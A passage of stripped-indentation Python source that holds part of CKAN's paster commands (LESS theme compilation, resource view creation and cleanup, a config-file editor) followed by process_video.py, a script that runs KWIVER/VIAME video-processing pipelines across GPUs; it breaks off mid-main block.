'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create all - Create views for all types.
paster views create [type1] [type2] ... - Create views for specified types.
paster views clean - Permanently delete views for all types no longer in the configuration file.
Supported types are "pdf", "text", "webpage", "image" and "grid". Make
sure the relevant plugins are loaded for the following types, otherwise
an error will be raised:
* "grid"-> "recline_grid_view"
* "pdf" -> "pdf_view"
* "text -> "text_view"
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def command(self):
self._load_config()
if not self.args:
print self.usage
elif self.args[0] == 'create':
self.create_views(self.args[1:])
elif self.args[0] == 'clean':
self.clean_views()
else:
print self.usage
def create_views(self, view_types):
supported_types = ['grid', 'text', 'webpage', 'pdf', 'image']
if not view_types:
print self.usage
return
if view_types[0] == 'all':
view_types = supported_types
else:
for view_type in view_types:
if view_type not in supported_types:
print 'View type {view} not supported in this command'.format(view=view_type)
return
for view_type in view_types:
create_function_name = 'create_%s_views' % view_type
create_function = getattr(self, create_function_name)
create_function()
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print 'No resource views to delete'
return
print 'This command will delete.\n'
for row in results:
print '%s of type %s' % (row[1], row[0])
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print 'Not Deleting.'
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print 'Deleted resource views.'
def create_text_views(self):
if not p.plugin_loaded('text_view'):
print 'Please enable the text_view plugin to make the text views.'
return
if not p.plugin_loaded('resource_proxy'):
print 'Please enable the resource_proxy plugin to make the text views.'
return
print 'Text resource views are being created'
import ckanext.textview.plugin as textplugin
formats = tuple(textplugin.DEFAULT_TEXT_FORMATS + textplugin.DEFAULT_XML_FORMATS +
textplugin.DEFAULT_JSON_FORMATS + textplugin.DEFAULT_JSONP_FORMATS)
resources = model.Resource.get_all_without_views(formats)
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'Text View',
'description': 'View of the {format} file'.format(
format=resource.format.upper()),
'resource_id': resource.id,
'view_type': 'text'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s text resource views created!' % count
def create_image_views(self):
import ckanext.imageview.plugin as imagevewplugin
formats = tuple(imagevewplugin.DEFAULT_IMAGE_FORMATS)
print 'Image resource views are being created'
resources = model.Resource.get_all_without_views(formats)
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'Resource Image',
'description': 'View of the Image',
'resource_id': resource.id,
'view_type': 'image'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s image resource views created!' % count
def create_webpage_views(self):
formats = tuple(['html', 'htm'])
print 'Web page resource views are being created'
resources = model.Resource.get_all_without_views(formats)
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'Web Page View',
'description': 'View of the webpage',
'resource_id': resource.id,
'view_type': 'webpage'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s webpage resource views created!' % count
def create_pdf_views(self):
if not p.plugin_loaded('pdf_view'):
print 'Please enable the pdf_view plugin to make the PDF views.'
return
if not p.plugin_loaded('resource_proxy'):
print 'Please enable the resource_proxy plugin to make the PDF views.'
return
print 'PDF resource views are being created'
resources = model.Resource.get_all_without_views(['pdf'])
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
count = 0
for resource in resources:
count += 1
resource_view = {'title': 'PDF View',
'description': 'PDF view of the resource.',
'resource_id': resource.id,
'view_type': 'pdf'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s pdf resource views created!' % count
def create_grid_views(self):
import ckan.plugins.toolkit as toolkit
import ckanext.datastore.db as db
import pylons
if not p.plugin_loaded('datastore'):
print 'The datastore plugin needs to be enabled to generate the grid views.'
return
if not p.plugin_loaded('recline_grid_view'):
print 'Please enable the recline_grid_view plugin to make the grid views.'
return
print 'Grid resource views are being created'
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
data_dict = {}
data_dict['connection_url'] = pylons.config['ckan.datastore.write_url']
resources_sql = sa.text(u'''SELECT name FROM "_table_metadata"
WHERE alias_of is null''')
results = db._get_engine(data_dict).execute(resources_sql)
count = 0
for row in results:
try:
res = logic.get_action('resource_view_list')(context, {'id': row[0]})
except toolkit.ObjectNotFound:
continue
if res:
continue
count += 1
resource_view = {'resource_id': row[0],
'view_type': 'recline_grid_view',
'title': 'Grid view',
'description': 'View of data within the DataStore'}
logic.get_action('resource_view_create')(context, resource_view)
print '%s grid resource views created!' % count
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
sys.stderr.write(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
sys.exit(1)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError, e:
sys.stderr.write(e.message)
sys.exit(1)
|
process_video.py
|
#!/usr/bin/env python
import sys
import os
import shutil
import math
import numpy as np
import argparse
import contextlib
import itertools
import signal
import subprocess
import tempfile
import threading
try:
import queue # Python 3
except ImportError:
import Queue as queue # Python 2
sys.dont_write_bytecode = True
import database_tool
# Character short-cuts and global constants
if os.name == 'nt':
div = '\\'
else:
div = '/'
lb = '\n'
lb1 = lb
lb2 = lb * 2
lb3 = lb * 3
detection_ext = "_detections.csv"
track_ext = "_tracks.csv"
default_pipeline = "pipelines" + div + "index_default.pipe"
no_pipeline = "none"
# Global flag to see if any video has successfully completed processing
any_video_complete = False
# Helper class to list files with a given extension in a directory
def list_files_in_dir( folder ):
if not os.path.exists( folder ) and os.path.exists( folder + ".lnk" ):
folder = folder + ".lnk"
folder = folder if not os.path.islink( folder ) else os.readlink( folder )
if not os.path.isdir( folder ):
exit_with_error( "Input folder \"" + folder + "\" does not exist" )
return [
os.path.join( folder, f ) for f in sorted( os.listdir( folder ) )
if not f.startswith('.')
]
def list_files_in_dir_w_ext( folder, extension ):
return [ f for f in list_files_in_dir( folder ) if f.endswith( extension ) ]
def has_valid_ext( f, ext_list ):
for ext in ext_list:
if f.lower().endswith( ext ):
return True
return False
def has_file_with_extension( folder, extension ):
for filename in list_files_in_dir_w_ext( folder, extension ):
if filename.endswith( extension ):
return True
return False
def list_files_in_dir_w_exts( folder, extensions ):
ext_list = extensions.split(";")
return [ f for f in list_files_in_dir( folder ) if has_valid_ext( f, ext_list ) ]
def list_videos_in_dir( folder, extensions ):
files = list_files_in_dir_w_exts( folder, extensions )
if len( files ) == 0:
files = [ f for f in list_files_in_dir( folder ) if os.path.isdir( f ) ]
if len( files ) == 0:
files = list_files_in_dir( folder )
return files
# Default message logging
def log_info( msg ):
sys.stdout.write( msg )
sys.stdout.flush()
# Create a directory if it doesn't exist
def create_dir( dirname, logging=True, recreate=False, prompt=True ):
if dirname == '.' or dirname == "":
return
if recreate:
if os.path.exists( dirname ):
if not prompt or database_tool.query_yes_no( lb1 + "Reset folder: " + dirname + "?" ):
if logging:
log_info( "Removing " + dirname + lb )
shutil.rmtree( dirname )
elif prompt:
sys.exit(0)
else:
log_info( lb )
if not os.path.exists( dirname ):
if logging:
log_info( "Creating " + dirname + lb )
os.makedirs( dirname )
CUDA_VISIBLE_DEVICES = "CUDA_VISIBLE_DEVICES"
def get_real_gpu_index(n):
"""Return the real index for the nth GPU as a string. This respects
CUDA_VISIBLE_DEVICES
"""
cvd = os.environ.get( CUDA_VISIBLE_DEVICES )
if not cvd: # Treat empty string and None the same
return str(n)
# This is an attempt to respect the fact that an invalid index hides
# the GPUs listed after it
cvd_parsed = list( itertools.takewhile( lambda i: not i.startswith('-'),
cvd.split(',') ) )
if 0 <= n < len( cvd_parsed ):
return cvd_parsed[n]
else:
raise IndexError('Only {} visible GPUs; you asked for number {}!'
.format( len( cvd_parsed ), n) )
def execute_command( cmd, stdout=None, stderr=None, gpu=None ):
if gpu is None:
env = None
else:
env = dict(os.environ)
env[ CUDA_VISIBLE_DEVICES ] = get_real_gpu_index( gpu )
return subprocess.call( cmd, stdout=stdout, stderr=stderr, env=env )
def get_script_path():
return os.path.dirname( os.path.realpath( sys.argv[0] ) )
def get_pipeline_cmd( debug=False ):
if os.name == 'nt':
if debug:
return [ 'kwiver.exe', 'runner' ]
else:
return [ 'kwiver.exe', 'runner' ]
else:
if debug:
return [ 'gdb', '--args', 'kwiver', 'runner' ]
else:
return [ 'kwiver', 'runner' ]
def exit_with_error( error_str, force=False ):
log_info( lb1 + 'ERROR: ' + error_str + lb2 )
# Kill this process to end all threads
if not isinstance( threading.current_thread(), threading._MainThread ):
if os.name == 'nt':
os.kill( os.getpid(), signal.SIGTERM )
else:
os.kill( os.getpid(), signal.SIGKILL )
# Default exit case, if main thread
sys.exit(0)
def check_file( filename ):
if not os.path.exists( filename ):
exit_with_error( "Unable to find: " + filename )
return filename
@contextlib.contextmanager
def get_log_output_files( output_prefix ):
if os.name == 'nt':
with open( output_prefix + '.out.txt', 'w' ) as fo, \
open( output_prefix + '.err.txt', 'w' ) as fe:
yield dict( stdout=fo, stderr=fe)
else:
with open( output_prefix + '.txt', 'w' ) as fo:
yield dict( stdout=fo, stderr=fo )
def find_file( filename ):
if( os.path.exists( filename ) ):
return filename
elif os.path.exists( get_script_path() + div + filename ):
return get_script_path() + div + filename
else:
exit_with_error( "Unable to find " + filename )
def make_filelist_for_dir( input_dir, output_dir, output_name ):
# The most common extension in the folder is most likely images.
# Sometimes people have small text files alongside the images
# so just choose the most common filetype.
exts = dict()
files = dict()
for f in sorted( os.listdir( input_dir ) ):
f_fp = os.path.join( input_dir, f )
if os.path.isfile( f_fp ):
_, ext = os.path.splitext( f )
if ext in exts:
exts[ext] += 1
files[ext].append( f_fp )
else:
exts[ext] = 1
files[ext] = [ f_fp ]
if len(exts) == 0:
return ""
top_ext = sorted( exts, key=exts.get, reverse=True )[0]
# Write out list to file
output_file = os.path.join( output_dir, output_name + ".txt" )
fout = open( output_file, "w" )
for f in files[top_ext]:
fout.write( os.path.abspath( f + lb1 ) )
fout.close()
return output_file
# Other helpers
def signal_handler( signal, frame ):
log_info( lb1 )
exit_with_error( 'Processing aborted, see you next time' )
def file_length( filename ):
if not os.path.exists( filename ):
exit_with_error( filename + " does not exist" )
with open( filename, 'r' ) as f:
for i, l in enumerate( f ):
pass
return i + 1
def split_image_list( image_list_file, n, dir ):
"""Create and return the paths to n temp files that when appended
reproduce the original file. The names are created
deterministically like "orig_name_part0.ext", "orig_name_part1.ext",
etc., but with the original name used as is when n == 1.
Existing files with the same names are overwritten without question.
Deleting the files is the responsibility of the caller.
"""
input_basename = os.path.basename( image_list_file )
if n == 1:
new_file_names = [ input_basename ]
else:
prefix, suffix = os.path.splitext( input_basename )
num_width = len( str( n - 1 ) )
new_file_names = [
prefix + '_part{:0{}}'.format( i, num_width ) + suffix
for i in range( n )
]
new_file_names = [ os.path.join( dir, fn ) for fn in new_file_names ]
try:
# Build manually to have the intermediate state in case of error
temp_files = []
divisor = math.floor( file_length( image_list_file ) / n ) + 1
for fn in new_file_names:
temp_files.append( open( fn, 'w' ) )
with open( image_list_file ) as f:
for i, line in enumerate( f ):
temp_index = int( math.floor( i / divisor ) )
temp_files[ temp_index ].write( line )
finally:
for f in temp_files:
f.close()
return new_file_names
def fset( setting_str ):
return ['-s', setting_str]
def video_output_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'track_writer:file_name=' + output_dir + div + basename + track_ext ),
fset( 'track_writer:stream_identifier=' + basename ),
fset( 'track_writer_db:writer:db:video_name=' + basename ),
fset( 'track_writer_kw18:file_name=' + output_dir + div + basename + '.kw18' ),
fset( 'descriptor_writer_db:writer:db:video_name=' + basename ),
fset( 'track_descriptor:uid_basename=' + basename ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def plot_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def archive_dimension_settings_list( options ):
if len( options.archive_width ) > 0:
return list(itertools.chain(
fset( 'kwa_writer:fixed_col_count=' + options.archive_width ),
fset( 'kwa_writer:fixed_row_count=' + options.archive_height ),
))
return []
def object_detector_settings_list( options ):
if len( options.detection_threshold ) > 0:
return list( itertools.chain(
fset( 'detector:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector1:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector2:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector_filter:filter:class_probablity_filter:threshold=' + options.detection_threshold ),
))
return []
def object_tracker_settings_list( options ):
if len( options.tracker_threshold ) > 0:
return list( itertools.chain(
fset( 'track_initializer:track_initializer:threshold:'
'filter:class_probablity_filter:threshold=' + options.tracker_threshold ),
fset( 'tracker:detection_select_threshold=' + options.tracker_threshold ),
))
return []
def video_frame_rate_settings_list( options ):
output = []
if len( options.input_frame_rate ) > 0:
output += fset( 'input:frame_time=' + str( 1.0 / float( options.input_frame_rate ) ) )
if len( options.frame_rate ) > 0:
output += fset( 'downsampler:target_frame_rate=' + options.frame_rate )
if len( options.batch_size ) > 0:
output += fset( 'downsampler:burst_frame_count=' + options.batch_size )
if len( options.batch_skip ) > 0:
output += fset( 'downsampler:burst_frame_break=' + options.batch_skip )
return output
def groundtruth_reader_settings_list( options, gt_files, basename, gpu_id, gt_type ):
output = []
if len( gt_files ) == 0:
exit_with_error( "Directory " + basename + " contains no GT files" )
elif len( gt_files ) > 1:
exit_with_error( "Directory " + basename + " contains multiple GT files" )
else:
if gpu_id > 0:
output_extension = str( gpu_id ) + '.lbl'
else:
output_extension = 'lbl'
lbl_file = options.input_dir + "/labels.txt"
if not os.path.exists( lbl_file ):
lbl_file = "labels.txt"
output += fset( 'detection_reader:file_name=' + gt_files[0] )
output += fset( 'detection_reader:reader:type=' + gt_type )
output += fset( 'write_descriptor_ids:category_file=' + lbl_file )
output += fset( 'write_descriptor_ids:output_directory=' + options.output_directory )
output += fset( 'write_descriptor_ids:output_extension=' + output_extension )
return output
def remove_quotes( input_str ):
return input_str.replace( "\"", "" )
def add_final_list_csv( args, video_list ):
if len( video_list ) == 0:
return
for video in video_list:
if video.endswith( "_part0.txt" ):
output_file = video_list[0].replace( "_part0.txt", detection_ext )
output_stream = open( output_file, "w" )
id_adjustment = 0
is_first = True
used_ids = set()
last_id = 0
input_stream = open( video.replace( ".txt", detection_ext ), "r" )
id_mappings = dict()
for line in input_stream:
if len( line ) > 0 and ( line[0] == '#' or line[0:9] == 'target_id' ):
if is_first:
output_stream.write( line )
continue
parsed_line = line.rstrip().split(',')
if len( parsed_line ) < 2:
continue
orig_id = int( parsed_line[0] )
if orig_id in id_mappings:
final_id = id_mappings[ orig_id ]
elif orig_id in used_ids:
last_id = last_id + 1
final_id = last_id
id_mappings[ orig_id ] = final_id
used_ids.add( final_id )
else:
final_id = orig_id
id_mappings[ orig_id ] = orig_id
used_ids.add( orig_id )
last_id = max( last_id, final_id )
parsed_line[0] = str( final_id )
parsed_line[2] = str( int( parsed_line[2] ) + id_adjustment )
output_stream.write( ','.join( parsed_line ) + '\n' )
id_adjustment = id_adjustment + file_length( video )
input_stream.close()
is_first = False
# Process a single video
def process_video_kwiver( input_name, options, is_image_list=False, base_ovrd='',
cpu=0, gpu=None, write_track_time=True ):
if gpu is None:
gpu = 0
multi_threaded = ( options.gpu_count * options.pipes > 1 )
auto_detect_gt = ( len( options.auto_detect_gt ) > 0 )
input_basename = os.path.basename( input_name )
input_ext = os.path.splitext( input_name )[1]
if multi_threaded:
log_info( 'Processing: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Processing: {} on GPU... '.format( input_basename ) )
# Get video name without extension and full path
if len( base_ovrd ) > 0:
basename_no_ext = base_ovrd
else:
basename_no_ext = os.path.splitext( input_basename )[0]
# Formulate input setting string
if auto_detect_gt:
if options.auto_detect_gt == 'habcam' or 'csv' in options.auto_detect_gt:
gt_ext = '.csv'
elif options.auto_detect_gt[0] != '.':
gt_ext = '.' + options.auto_detect_gt
else:
gt_ext = options.auto_detect_gt
if not is_image_list and \
( input_ext == '.csv' or input_ext == '.txt' or input_name == "__pycache__" ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif not os.path.exists( input_name ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif os.path.isdir( input_name ):
if auto_detect_gt:
gt_files = list_files_in_dir_w_ext( input_name, gt_ext )
input_name = make_filelist_for_dir( input_name, options.output_directory, basename_no_ext )
if len( input_name ) == 0:
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
is_image_list = True
elif auto_detect_gt:
input_path = os.path.dirname( os.path.abspath( input_name ) )
gt_files = list_files_in_dir_w_ext( input_path, gt_ext )
# Formulate command
input_settings = fset( 'input:video_filename=' + input_name )
if not is_image_list:
input_settings += fset( 'input:video_reader:type=vidl_ffmpeg' )
elif options.ts_from_file:
input_settings += fset( 'input:video_reader:type=add_timestamp_from_filename' )
command = ( get_pipeline_cmd( options.debug ) +
[ find_file( options.pipeline ) ] +
input_settings )
command += video_frame_rate_settings_list( options )
command += video_output_settings_list( options, basename_no_ext )
command += archive_dimension_settings_list( options )
command += object_detector_settings_list( options )
command += object_tracker_settings_list( options )
if options.write_svm_info and not auto_detect_gt:
if len( options.input_detections ) == 0:
exit_with_error( "Input detections must be specified to write out svm header info" )
if not os.path.exists( options.input_detections ):
exit_with_error( "Unable to find input detections" )
gt_files = [ options.input_detections ]
if auto_detect_gt or options.write_svm_info:
gt_type = options.auto_detect_gt if auto_detect_gt else "viame_csv"
command += groundtruth_reader_settings_list( options, gt_files, basename_no_ext, gpu, gt_type )
if write_track_time:
command += fset( 'track_writer:writer:viame_csv:write_time_as_uid=true' )
else:
command += fset( 'track_writer:writer:viame_csv:stream_identifier=' + input_basename )
if len( options.input_detections ) > 0:
command += fset( "detection_reader:file_name=" + options.input_detections )
try:
if len( options.extra_settings ) > 0:
for extra_option in options.extra_settings:
command += fset( " ".join( extra_option ) )
except:
pass
# Process command, possibly with logging
log_base = ""
if len( options.log_directory ) > 0 and not options.debug and options.log_directory != "PIPE":
log_base = options.output_directory + div + options.log_directory + div + basename_no_ext
with get_log_output_files( log_base ) as kwargs:
res = execute_command( command, gpu=gpu, **kwargs )
else:
res = execute_command( command, gpu=gpu )
global any_video_complete
if res == 0:
if multi_threaded:
log_info( 'Completed: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Success' + lb1 )
any_video_complete = True
else:
if multi_threaded:
log_info( 'Failure: {} on GPU {} Failed'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Failure' + lb1 )
if res == -11:
s = os.statvfs( options.output_directory )
if s.f_bavail * s.f_frsize < 100000000:
exit_with_error( lb1 + 'Out of disk space. Clean up space and then re-run.' )
log_info( lb1 + 'Pipeline failed with code 11. This is typically indicative of an '
'issue with system resources, e.g. low disk space or running out of '
'memory, but could be indicative of a pipeline issue. It\'s also possible '
'the pipeline you are running just had a shutdown issue. Attempting to '
'continue processing.' + lb1 )
any_video_complete = True
if not any_video_complete:
if len( log_base ) > 0:
exit_with_error( 'Processing failed, check ' + log_base + '.txt, terminating.' )
else:
exit_with_error( 'Processing failed, terminating.' )
elif len( log_base ) > 0:
log_info( lb1 + 'Check ' + log_base + '.txt for error messages' + lb2 )
# Main Function
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description="Process new videos",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-v", dest="input_video", default="",
help="Input single video to process")
parser.add_argument("-d", dest="input_dir", default="",
help="Input directory of videos or image folders to process")
parser.add_argument("-l", dest="input_list", default="",
help="Input list of image files to process")
parser.add_argument("-p", dest="pipeline", default=default_pipeline,
help="Input pipeline for processing video or image data")
parser.add_argument("-s", dest="extra_settings", action='append', nargs='*',
help="Extra command line arguments for the pipeline runner")
parser.add_argument("-id", dest="input_detections", default="",
help="Input detections around which to create descriptors")
parser.add_argument("-o", dest="output_directory", default=".",
help="Output directory to store files in")
parser.add_argument("-logs", dest="log_directory", default="logs",
help="Output sub-directory for log files, if empty will not use files")
parser.add_argument("-video-exts", dest="video_exts", default="3qp;3g2;amv;asf;avi;drc;gif;gifv;"
"f4v;f4p;f4a;f4bflv;m4v;mkv;mp4;m4p;m4v;mpg;mpg2;mp2;mpeg;mpe;mpv;mng;mts;"
"m2ts;mov;mxf;nsv;ogg;ogv;qt;roq;rm;rmvb;svi;webm;wmv;vob;yuv",
help="Allowable video extensions")
parser.add_argument("-image-exts", dest="image_exts", default="bmp;dds;gif;heic;jpg;jpeg;png;psd;"
"psp;pspimage;tga;thm;tif;tiff;yuv",
help="Allowable image extensions")
parser.add_argument("-frate", dest="frame_rate", default="",
help="Processing frame rate over-ride to process videos at, specified "
"in hertz (frames per second)" )
parser.add_argument("-fbatch", dest="batch_size", default="",
help="Optional number of frames to process in batches")
parser.add_argument("-fskip", dest="batch_skip", default="",
help="If batching frames, number of frames to skip between batches")
parser.add_argument("-ifrate", dest="input_frame_rate", default="",
help="Input frame rate over-ride to process videos at. This is useful "
"for specifying the frame rate of input image lists, which typically "
"don't have frame rates")
parser.add_argument("-detection-threshold", dest="detection_threshold", default="",
help="Optional detection threshold over-ride parameter")
parser.add_argument("-tracker-threshold", dest="tracker_threshold", default="",
help="Optional tracking threshold over-ride parameter")
parser.add_argument("-archive-height", dest="archive_height", default="",
help="Advanced: Optional video archive height over-ride")
parser.add_argument("-archive-width", dest="archive_width", default="",
help="Advanced: Optional video archive width over-ride")
parser.add_argument("-gpus", "--gpu-count", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("-pipes-per-gpu", "--pipes", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("--detection-plots", dest="detection_plots", action="store_true",
help="Produce per-video detection plot summaries")
parser.add_argument("--track-plots", dest="track_plots", action="store_true",
help="Produce per-video track plot summaries")
parser.add_argument("-plot-objects", dest="objects", default="fish",
help="Objects to generate plots for")
parser.add_argument("-plot-threshold", dest="plot_threshold", default=0.25, type=float,
help="Threshold to generate plots for")
parser.add_argument("-plot-smooth", dest="smooth", default=1, type=int,
help="Smoothing factor for plots")
parser.add_argument("-auto-detect-gt", dest="auto_detect_gt", default="",
help="Automatically pass to pipes GT of this type if present")
parser.add_argument("--init-db", dest="init_db", action="store_true",
help="Re-initialize database")
parser.add_argument("--build-index", dest="build_index", action="store_true",
help="Build searchable index on completion")
parser.add_argument("--ball-tree", dest="ball_tree", action="store_true",
help="Use a ball tree for the searchable index")
parser.add_argument("--no-reset-prompt", dest="no_reset_prompt", action="store_true",
help="Don't prompt if the output folder should be reset")
parser.add_argument("--ts-from-file", dest="ts_from_file", action="store_true",
help="Attempt to retrieve timestamps from image filenames.")
parser.add_argument("--write-svm-info", dest="write_svm_info", action="store_true",
help="Write out header information used for training SVMs")
parser.add_argument("--debug", dest="debug", action="store_true",
help="Run with debugger attached to process")
parser.add_argument("-install", dest="install_dir", default="",
help="Optional install dir over-ride for all application "
"binaries. If this is not specified, it is expected that all "
"viame binaries are already in our path.")
args = parser.parse_args()
# Assorted error checking up front
process_data = True
number_input_args = sum(len(inp_x) > 0 for inp_x in [args.input_video, args.input_dir, args.input_list])
if number_input_args == 0 or args.pipeline == no_pipeline:
if not args.build_index and not args.detection_plots and not args.track_plots:
exit_with_error( "Either input video or input directory must be specified" )
else:
process_data = False
elif number_input_args > 1:
exit_with_error( "Only one of input video, directory, or list should be specified, not more" )
if ( args.detection_plots or args.track_plots ) and len( args.frame_rate ) == 0:
exit_with_error( "Must specify frame rate if generating detection or track plots" )
signal.signal( signal.SIGINT, signal_handler )
# Initialize database
if args.init_db:
if len( args.log_directory ) > 0:
init_log_file = args.output_directory + div + args.log_directory + div + "database_log.txt"
else:
init_log_file = ""
db_is_init, user_select = database_tool.init( log_file=init_log_file, prompt=(not args.no_reset_prompt) )
if not db_is_init:
if user_select:
log_info( "User decided to not initialize new database, shutting down." + lb2 )
sys.exit( 0 )
elif len( args.log_directory ) > 0:
exit_with_error( "Unable to initialize database, check " + init_log_file + lb2 +
"You may have another database running on your system, or ran "
"a failed operation in the past and need to re-log or restart." )
else:
exit_with_error( "Unable to initialize database" )
log_info( lb1 )
# Call processing pipelines on all input data
if process_data:
# Handle output directory creation if necessary
if len( args.output_directory ) > 0:
recreate_dir = ( not args.init_db and not args.no_reset_prompt )
prompt_user = ( not args.no_reset_prompt )
create_dir( args.output_directory, logging=False, recreate=recreate_dir, prompt=prompt_user )
if len( args.log_directory ) > 0:
